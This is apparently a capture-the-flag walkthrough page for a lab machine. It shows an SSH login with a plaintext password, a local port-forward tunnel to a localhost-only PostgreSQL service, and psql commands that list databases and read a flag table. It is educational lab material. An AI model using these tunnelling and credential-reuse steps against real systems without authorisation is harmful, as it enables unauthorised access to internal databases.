LOCAL PORT FORWARDING

#
root@oco:~$ ssh christine@10.129.22.40 -L 31173:127.0.0.1:5432
 christine@10.129.22.40's password: funnel123#!#
 
 * the ssh client (attackerMachine) will establish a secure connection 
   to the remote SSH server (targetMachine). the ssh client (attackerMachine)
   will listen for incoming connections on the local port (attackerMachine)
   on port 31173.
    - when a client connects to the local port, the ssh client (attackingMachine)
      will forward the connection to the remote server (targetMachine) on port
      5432. this allows the local client (attackingMachine) to access services
      on the remote server (targetMachine) as if they were running on the 
      local machine.
      
christine@funnel:~$ ss -tlpna
 State     Recv-Q  Send-Q  Local Address:Port   Peer Address:Port    Process
 LISTEN    0       4096    127.0.0.53%lo:53     0.0.0.0:*             
 LISTEN    0       128     0.0.0.0:22           0.0.0.0:*           
 LISTEN    0       4096    127.0.0.1:5432       0.0.0.0:*            
 LISTEN    0       4096    127.0.0.1:38617      0.0.0.0:*            
 ESTAB     0       0       10.129.22.40:22      10.10.14.215:46754  
 SYN-SENT  0       1       10.129.22.40:42680   8.8.8.8:53           
 LISTEN    0       32      *:21                 *:*                  
 LISTEN    0       128     [::]:22              [::]:*

#
root@oco:~$ psql -U christine -h localhost -p 31173
 Password for user christine: 
 psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
 Type "help" for help.

christine=# 

 * ensure to specify localhost using the -h option to target the tunnel
   created earlier with SSH, as well as port 31173 with the -p option, 
   which is the port the tunnel is listening on.
   
christine=# \list
                                                   List of databases
   Name    |   Owner   | Encoding |  Collate   |   Ctype    | ICU Locale | Locale Provider |    Access privileges    
 -----------+-----------+----------+------------+------------+------------+-----------------+-------------------------
 christine | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 postgres  | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 secrets   | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 template0 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 template1 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 (5 rows)

 * this list the existing DB
 
christine=# \connect secrets
 psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
 You are now connected to database "secrets" as user "christine".

 * this connects to the specified DB
 
secrets=# \dt 
          List of relations
 Schema | Name | Type  |   Owner   
 --------+------+-------+-----------
 public | flag | table | christine
 (1 row)

 * list the database's tables
 
secrets=# select * from flag;
              value               
 ----------------------------------
 cf277664b1771217d7006acdea006db1
 (1 row)

PreviousPORT FORWARDING NextDISCOVERY

Last updated 1 month ago